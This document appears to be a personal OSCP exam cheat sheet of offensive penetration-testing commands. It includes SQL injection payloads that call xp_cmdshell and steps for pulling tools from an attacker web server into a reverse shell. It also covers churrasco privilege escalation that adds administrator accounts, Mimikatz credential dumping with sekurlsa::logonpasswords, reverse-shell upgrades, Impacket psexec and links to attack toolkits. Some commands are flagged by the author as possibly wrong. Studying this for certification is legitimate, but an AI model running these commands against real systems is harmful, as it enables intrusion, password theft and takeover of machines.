Just Try Harder and pass the OSCP!
host -t axfr test.local 10.10.10.10
host -l test.local 10.10.10.10
Wget Transfer How to retrieve file(s) from host (inside a reverse shell)
1. Place file you want transferred in /var/www/html/
2. # service apache2 start
3. # wget http://10.10.10.10/pspy64 <- for single file
4. # wget -r http://10.10.10.10/pspy64/ <- for folder
- EXEC master..xp_cmdshell 'whoami';
- meh' exec master..xp_cmdshell 'whoami' --
- grep -Ri 'password' .
- find / -perm -4000 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} \;
- c:\Inetpub>churrasco -d "net user /add "
- c:\Inetpub>churrasco -d "net localgroup administrators /add"
- c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
- Mimikatz.exe (run it)
- privilege::debug
- sekurlsa::logonpasswords
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
- nmap -sT -sU -p- --min-rate 10000
- nmap -sT -sU -p <open ports separated by commas> -A (obviously drop -sU if no UDP ports are open)
- TCP: nmap -p- -iL ips.txt > AllTCPPorts.txt
- UDP (can take hours so maybe netstat is a better alternative):
  nmap -p- -sU -iL ips.txt > udp.txt
  nmap -sU -sV -iL ips.txt > alludpports.txt
- SNMP: nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)
- SSH: nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt
- SSL: nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt
sshuttle -r [email protected] 10.1.1.0/24
- In reverse shell
- python -c 'import pty; pty.spawn("/bin/bash")'
- Ctrl-Z
- In Kali
- stty raw -echo
- fg
- In reverse shell
- reset (sometimes optional)
- export SHELL=bash
- export TERM=xterm-256color
- stty rows <rows> columns <cols> (optional)
Linux netstat syntax
- netstat -tulpn | grep LISTEN
FreeBSD/MacOS X netstat syntax
- netstat -anp tcp | grep LISTEN
- netstat -anp udp | grep LISTEN
OpenBSD netstat syntax
- netstat -na -f inet | grep LISTEN
- netstat -nat | grep LISTEN
Nmap scan syntax
- sudo nmap -sT -O localhost
- sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
- sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##
- Impacket's PSEXEC: /usr/share/doc/python-impacket/examples/psexec.py [email protected]
  Password: (password)
  [*] Trying protocol 445/SMB...
- Impacket's SMBServer: cd /usr/share/windows-binaries && python /usr/share/doc/python-impacket/examples/smbserver.py a .
- https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt
- https://github.com/samratashok/nishang
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- https://github.com/rasta-mouse/Sherlock
- net user
- net user USERNAME NEWPASS
- net user "USER NAME" NEWPASS